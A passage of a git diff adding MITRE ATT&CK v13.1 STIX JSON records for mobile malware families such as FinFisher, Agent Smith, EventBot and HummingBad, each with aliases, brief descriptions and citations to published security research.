b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a5528622-3a8a-4633-86ce-8cdaf8423858.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--de65019e-6860-4c89-a406-2bb801d72ba0", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows", + "Android" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_aliases": [ + "FinFisher", + "FinSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0182", + "url": "https://attack.mitre.org/software/S0182", + "source_name": "mitre-attack" + }, + { + "source_name": "FinFisher", + "description": "(Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017)" + }, + { + "source_name": "FinSpy", + "description": "(Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017)" + }, + { + "url": "http://www.finfisher.com/FinFisher/index.html", + "description": "FinFisher. (n.d.). Retrieved December 20, 2017.", + "source_name": "FinFisher Citation" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "description": "Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. Retrieved February 15, 2018.", + "source_name": "FireEye FinSpy Sept 2017" + }, + { + "source_name": "Securelist BlackOasis Oct 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.", + "url": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + }, + { + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", + "description": "Allievi, A.,Flori, E. (2018, March 01). FinFisher exposed: A researcher\u2019s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.", + "source_name": "Microsoft FinFisher March 2018" + } + ], + "modified": "2022-03-02T15:47:13.329Z", + "name": "FinFisher", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)", + "x_mitre_version": "1.4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a6228601-03f6-4949-ae22-c1087627a637.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a6228601-03f6-4949-ae22-c1087627a637.json new file mode 100644 index 0000000000000000000000000000000000000000..7bee296570b0a5719d443b6257ef654355119914 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a6228601-03f6-4949-ae22-c1087627a637.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--3edfeaa2-f972-4e01-9441-4b36b3ef28ea", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Agent Smith" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "type": "malware", + "created": "2020-05-07T15:18:34.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0440", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0440" + }, + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-06-17T12:49:21.423Z", + "name": "Agent Smith", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a76b837b-93cc-417d-bf28-c47a6a284fa4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a76b837b-93cc-417d-bf28-c47a6a284fa4.json new file mode 100644 index 0000000000000000000000000000000000000000..b012e1f26bfd8c6f1540a4fb459c34f3a3b7099d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a76b837b-93cc-417d-bf28-c47a6a284fa4.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--062470c8-a31a-4183-901a-45d685404979", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Asacub", + "Trojan-SMS.AndroidOS.Smaps" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "type": "malware", + "created": "2020-12-14T15:02:35.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0540", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0540" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Smaps", + "description": "(Citation: Securelist Asacub)" + }, + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-16T20:21:43.239Z", + "name": "Asacub", + "description": "[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims\u2019 bank accounts. It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a993495c-9813-4372-b9ec-d168c7f7ec0a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a993495c-9813-4372-b9ec-d168c7f7ec0a.json new file mode 100644 index 0000000000000000000000000000000000000000..20c7ead3420e1912160b575be73a7498252598b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a993495c-9813-4372-b9ec-d168c7f7ec0a.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--33c1d4c8-9f51-482e-9d44-4a80d1f17abd", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GPlayed" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "type": "malware", + "created": "2020-11-24T17:55:12.561Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0536", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0536" + }, + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.561Z", + "name": "GPlayed", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aecc0097-c9f8-4786-9b39-e891ff173f54.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aecc0097-c9f8-4786-9b39-e891ff173f54.json new file mode 100644 index 0000000000000000000000000000000000000000..61d9de34d4796ccec395e3c48a381937606eb504 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aecc0097-c9f8-4786-9b39-e891ff173f54.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--94df2d37-6456-49a2-ace2-9683d0fd7345", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "EventBot" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "type": "malware", + "created": "2020-06-26T14:55:12.847Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0478", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0478" + }, + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T21:01:58.595Z", + "name": "EventBot", + "description": "[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android\u2019s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aef537ba-10c2-40ed-a57a-80b8508aada4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aef537ba-10c2-40ed-a57a-80b8508aada4.json new file mode 100644 index 0000000000000000000000000000000000000000..b225116e8f9613c505932037ff3046486935ddc7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--aef537ba-10c2-40ed-a57a-80b8508aada4.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--61ceb2c7-7d85-45e5-8f86-4fcb256cdb12", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "HenBox" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "type": "malware", + "created": "2020-12-17T20:15:22.110Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0544", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0544" + }, + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2021-04-12T03:02:06.792Z", + "name": "HenBox", + "description": "[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c0efbaae-9e7d-4716-a92d-68373aac7424.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c0efbaae-9e7d-4716-a92d-68373aac7424.json new file mode 100644 index 0000000000000000000000000000000000000000..83853b65b7317722c9f87fad746ae3e6c566175c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c0efbaae-9e7d-4716-a92d-68373aac7424.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--0ae429c5-b2b3-4dd6-ab62-eb1e162318e7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Riltok" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "type": "malware", + "created": "2019-08-07T15:57:12.877Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0403", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0403" + }, + { + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "source_name": "Kaspersky Riltok June 2019" + } + ], + "modified": "2019-09-18T13:44:13.080Z", + "name": "Riltok", + "description": "[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c.json new file mode 100644 index 0000000000000000000000000000000000000000..baaf0b5f099c2741171fffce880f42def6aeb6c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--d035a907-d888-4909-84e1-56be02857455", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GolfSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "type": "malware", + "created": "2020-01-27T17:05:57.712Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0421", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0421" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020." + } + ], + "modified": "2020-03-26T20:50:07.023Z", + "name": "GolfSpy", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878.json new file mode 100644 index 0000000000000000000000000000000000000000..3316ebf0fad47a15c2ab08634ee024c8df4f84b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--568445c5-ba3f-42f5-a61b-2b6c1b80db71", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Pallas" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "type": "malware", + "created": "2019-07-10T15:35:43.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0399", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0399" + }, + { + "source_name": "Pallas", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-09-18T20:17:17.744Z", + "name": "Pallas", + "description": "[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24.json new file mode 100644 index 0000000000000000000000000000000000000000..d7f75b2394f98b45595b2bcdec2f026b58f28cf1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--6fdf805c-cb19-4939-ba96-f302d0e85d6f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Circles" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24", + "type": "malware", + "created": "2021-04-26T15:33:55.798Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0602", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0602" + }, + { + "source_name": "CitizenLab Circles", + "url": "https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/", + "description": "Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. Retrieved December 23, 2020." + } + ], + "modified": "2021-04-26T15:33:55.798Z", + "name": "Circles", + "description": "[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company\u2019s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0.json new file mode 100644 index 0000000000000000000000000000000000000000..5f10c38a0a90bf9814e7da1f774ddb6e3cfac7c7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--4e6d1181-2e52-485d-aafa-f1e74094a0b5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Tiktok Pro" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "type": "malware", + "created": "2021-01-05T20:16:19.968Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0558", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0558" + }, + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-04-19T16:30:16.930Z", + "name": "Tiktok Pro", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c709da93-20c3-4d17-ab68-48cba76b2137.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c709da93-20c3-4d17-ab68-48cba76b2137.json new file mode 100644 index 0000000000000000000000000000000000000000..91eb89fae311e4974b7f34e3a441d51be0489c43 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c709da93-20c3-4d17-ab68-48cba76b2137.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--8068635a-ed0d-4cde-9d3d-2fd70e2e5ce7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "PJApps", + "description": "[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. (Citation: Lookout-EnterpriseApps)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "created": "2017-10-25T14:48:43.527Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0291", + "external_id": "S0291" + }, + { + "source_name": "PJApps", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c80a6bef-b3ce-44d0-b113-946e93124898.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c80a6bef-b3ce-44d0-b113-946e93124898.json new file mode 100644 index 0000000000000000000000000000000000000000..bce0835306f49cd748371793b2c2541035e1d264 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c80a6bef-b3ce-44d0-b113-946e93124898.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--f6bed46f-8959-4b91-a8ed-930e091cc3b0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ShiftyBug", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. (Citation: Lookout-Adware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "created": "2017-10-25T14:48:38.690Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0294", + "external_id": "S0294" + }, + { + "source_name": "ShiftyBug", + "description": "(Citation: Lookout-Adware)" + }, + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c8770c81-c29f-40d2-a140-38544206b2b4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c8770c81-c29f-40d2-a140-38544206b2b4.json new file mode 100644 index 0000000000000000000000000000000000000000..eba4e12901357b042a766e68429449628ab97a0a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c8770c81-c29f-40d2-a140-38544206b2b4.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--db7b04e7-f6a0-4222-b056-a78f6b3e4cfe", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T18:52:08.966Z", + "name": "HummingBad", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android. (Citation: ArsTechnica-HummingBad)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "HummingBad" + ], + "type": "malware", + "id": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "created": "2017-10-25T14:48:42.948Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0322", + "external_id": "S0322" + }, + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 